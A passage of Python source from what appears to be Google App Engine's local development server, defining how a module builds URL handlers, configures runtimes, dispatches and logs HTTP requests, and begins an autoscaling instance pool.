from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import gcs_server
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import health_check_service
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
import six
from six.moves import range
from six.moves import zip
try:
from google.appengine.tools.devappserver2 import java_runtime
except ImportError:
java_runtime = None
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import vm_runtime_factory
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
_MAX_UPLOAD_MEGABYTES = 32
_MAX_UPLOAD_BYTES = _MAX_UPLOAD_MEGABYTES * 1024 * 1024
_MAX_UPLOAD_NO_TRIGGER_BAD_CLIENT_BYTES = 64 * 1024 * 1024
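# In practice: uploads are rejected above 32 MiB, but request bodies up to
# 64 MiB are still drained before the 413 response is sent (see the size check
# in _handle_request) so clients that mishandle an early connection close
# still receive the error page.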
_REDIRECT_HTML = '''\
<HTML><HEAD><meta http-equiv="content-type" content="%(content-type)s">
<TITLE>%(status)d Moved</TITLE></HEAD>
<BODY><H1>%(status)d Moved</H1>
The document has moved
<A HREF="%(correct-url)s">here</A>.
</BODY></HTML>'''
_TIMEOUT_HTML = '<HTML><BODY>503 - This request has timed out.</BODY></HTML>'
# Factor applied to the request timeouts to compensate for the
# long vmengines reloads. TODO eventually remove that once we have
# optimized the vm_engine reload.
_VMENGINE_SLOWDOWN_FACTOR = 2
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
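# Illustrative example (added, not in the original source): a single STATIC_DIR
# handler with static_dir 'static' yields roughly r'^(static/.*)$' on POSIX;
# multiple handlers are OR-ed together with '|'.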
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error as e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
# TODO: uncomment for GA.
# 'vm': vm_runtime_factory.VMRuntimeInstanceFactory,
}
if java_runtime:
_RUNTIME_INSTANCE_FACTORIES.update({
'java': java_runtime.JavaRuntimeInstanceFactory,
'java7': java_runtime.JavaRuntimeInstanceFactory,
})
_MAX_REQUEST_WAIT_TIME = 10
def _get_wait_time(self):
"""Gets the wait time before timing out a request.
Returns:
The timeout value in seconds.
"""
if self.vm_enabled():
return self._MAX_REQUEST_WAIT_TIME * _VMENGINE_SLOWDOWN_FACTOR
return self._MAX_REQUEST_WAIT_TIME
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
An instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
A list of url_handler.URLHandlers that can react as described in the
given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
url_pattern = '/%s' % gcs_server.GCS_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(gcs_server.Application(), url_pattern))
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
if self._threadsafe_override is None:
runtime_config.threadsafe = self._module_configuration.threadsafe or False
else:
runtime_config.threadsafe = self._threadsafe_override
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
runtime_config.api_host = self._api_host
runtime_config.api_port = self._api_port
runtime_config.server_port = self._balanced_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
if self._max_instances is not None:
runtime_config.max_instances = self._max_instances
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in list((self._module_configuration.env_variables or {}).items()):
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._php_config and self._module_configuration.runtime == 'php':
runtime_config.php_config.CopyFrom(self._php_config)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
if (self._java_config and
self._module_configuration.runtime.startswith('java')):
runtime_config.java_config.CopyFrom(self._java_config)
if self._vm_config:
runtime_config.vm_config.CopyFrom(self._vm_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
logging.info(
'Detected file changes:\n %s', '\n '.join(sorted(file_changes)))
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=bool(file_changes))
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIModule listens for RPC requests on.
api_port: The port that APIModule listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._version = module_configuration.major_version
self._app_name_external = module_configuration.application_external_name
self._host = host
self._api_host = api_host
self._api_port = api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_config = php_config
self._python_config = python_config
self._java_config = java_config
self._cloud_sql_config = cloud_sql_config
self._vm_config = vm_config
self._request_data = request_data
self._allow_skipped_files = allow_skipped_files
self._threadsafe_override = threadsafe_override
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
self._default_version_port = default_version_port
self._port_registry = port_registry
if self.vm_enabled():
self._RUNTIME_INSTANCE_FACTORIES['vm'] = (
vm_runtime_factory.VMRuntimeInstanceFactory)
self._instance_factory = self._create_instance_factory(
self._module_configuration)
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
def vm_enabled(self):
# TODO: change when GA
return self._vm_config
@property
def name(self):
"""The name of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even if the
module configuration changes.
"""
return self._name
@property
def version(self):
"""The version of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even if the
module configuration changes.
"""
return self._version
@property
def app_name_external(self):
"""The external application name of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even if the
module configuration changes.
"""
return self._app_name_external
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def runtime(self):
"""Runtime property for this module."""
return self._module_configuration.runtime
@property
def effective_runtime(self):
"""Effective_runtime property for this module."""
return self._module_configuration.effective_runtime
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status, body=None):
if body:
start_response(
'%d %s' % (status, six.moves.http_client.responses[status]),
[('Content-Type', 'text/html'),
('Content-Length', str(len(body)))])
return body
start_response('%d %s' % (status, six.moves.http_client.responses[status]), [])
return []
def _handle_request(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst:
try:
environ['SERVER_PORT'] = str(self.get_instance_port(inst.instance_id))
except request_info.NotSupportedWithAutoScalingError:
environ['SERVER_PORT'] = str(self.balanced_port)
else:
environ['SERVER_PORT'] = str(self.balanced_port)
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], self._default_version_port)
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (six.moves.urllib.parse.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = six.moves.urllib.parse.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.major_version,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version,
module=self._module_configuration.module_name)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
content_length = int(environ.get('CONTENT_LENGTH', '0'))
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'DELETE', 'TRACE') and
content_length != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
# Do not apply request limits to internal _ah handlers (known to break
# blob uploads).
# TODO: research if _ah handlers need limits.
if (not environ.get('REQUEST_URI', '/').startswith('/_ah/') and
content_length > _MAX_UPLOAD_BYTES):
# As allowed by the RFC, cherrypy closes the connection for 413 errors.
# Most clients do not handle this correctly and treat the page as
# unavailable if the connection is closed before the client can send
# all the data. To match the behavior of production, for large files
# < 64M read the data to prevent the client bug from being triggered.
if content_length <= _MAX_UPLOAD_NO_TRIGGER_BAD_CLIENT_BYTES:
environ['wsgi.input'].read(content_length)
status = '%d %s' % (six.moves.http_client.REQUEST_ENTITY_TOO_LARGE,
six.moves.http_client.responses[six.moves.http_client.REQUEST_ENTITY_TOO_LARGE])
wrapped_start_response(status, [])
return ['Upload limited to %d megabytes.' % _MAX_UPLOAD_MEGABYTES]
with self._handler_lock:
handlers = self._handlers
try:
path_info = environ['PATH_INFO']
path_info_normal = self._normpath(path_info)
if path_info_normal != path_info:
# While a 301 Moved Permanently makes more sense for non-normal
# paths, prod issues a 302 so we do the same.
return self._redirect_302_path_info(path_info_normal,
environ,
wrapped_start_response)
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(path_info)
if match:
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except Exception as e:
logging.exception('Request to %r failed', path_info)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _async_shutdown_instance(self, inst, port):
return _THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
@staticmethod
def _quote_querystring(qs):
"""Quote a query string to protect against XSS."""
parsed_qs = six.moves.urllib.parse.parse_qs(qs, keep_blank_values=True)
# urlparse.parse_qs returns a dictionary with values as lists while
# urllib.urlencode does not handle those. Expand to a list of
# key values.
expanded_qs = []
for key, multivalue in list(parsed_qs.items()):
for value in multivalue:
expanded_qs.append((key, value))
return six.moves.urllib.parse.urlencode(expanded_qs)
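# Illustrative example (added, not in the original source):
#   _quote_querystring('a=1&b=<x>')  ->  'a=1&b=%3Cx%3E'
# (pair order may differ on interpreters whose dicts are unordered).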
def _redirect_302_path_info(self, updated_path_info, environ, start_response):
"""Redirect to an updated path.
Respond to the current request with a 302 Found status with an updated path
but preserving the rest of the request.
Notes:
- WSGI does not make the fragment available so we are not able to preserve
it. Luckily prod does not preserve the fragment so it works out.
Args:
updated_path_info: the new HTTP path to redirect to.
environ: WSGI environ object.
start_response: WSGI start response callable.
Returns:
WSGI-compatible iterable object representing the body of the response.
"""
correct_url = six.moves.urllib.parse.urlunsplit(
(environ['wsgi.url_scheme'],
environ['HTTP_HOST'],
six.moves.urllib.parse.quote(updated_path_info),
self._quote_querystring(environ['QUERY_STRING']),
None))
content_type = 'text/html; charset=utf-8'
output = _REDIRECT_HTML % {
'content-type': content_type,
'status': six.moves.http_client.FOUND,
'correct-url': correct_url
}
start_response('%d %s' % (six.moves.http_client.FOUND, six.moves.http_client.responses[six.moves.http_client.FOUND]),
[('Content-Type', content_type),
('Location', correct_url),
('Content-Length', str(len(output)))])
return output
@staticmethod
def _normpath(path):
"""Normalize the path by handling . and .. directory entries.
Normalizes the path. A directory entry of . is just dropped while a
directory entry of .. removes the previous entry. Note that unlike
os.path.normpath, redundant separators remain in place to match prod.
Args:
path: an HTTP path.
Returns:
A normalized HTTP path.
"""
normalized_path_entries = []
for entry in path.split('/'):
if entry == '..':
if normalized_path_entries:
normalized_path_entries.pop()
elif entry != '.':
normalized_path_entries.append(entry)
return '/'.join(normalized_path_entries)
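# Illustrative examples (added, not in the original source):
#   _normpath('/a/./b/../c')  ->  '/a/c'
#   _normpath('/a//b')        ->  '/a//b'   (redundant separators are kept)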
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
variable length to emulate the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
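# For reference: generate_request_log_id() returns 30-99 lowercase hex
# characters, while generate_request_id_hash() always returns exactly
# _REQUEST_ID_HASH_LENGTH (8) uppercase hex characters.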
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
Raises:
request_info.NotSupportedWithAutoScalingError: Always.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_host,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_config,
self._python_config,
self._java_config,
self._cloud_sql_config,
self._vm_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files,
self._threadsafe_override)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, six.text_type):
body = body.encode('ascii')
url = six.moves.urllib.parse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': io.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': io.BytesIO(body)}
if fake_login:
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
util.put_headers_in_environ(headers, environ)
environ['HTTP_HOST'] = host
return environ
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
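# Illustrative examples (added, not in the original source):
#   _parse_pending_latency('0.1s')   ->  0.1
#   _parse_pending_latency('250ms')  ->  0.25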
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
module_configuration,
host,
balanced_port,
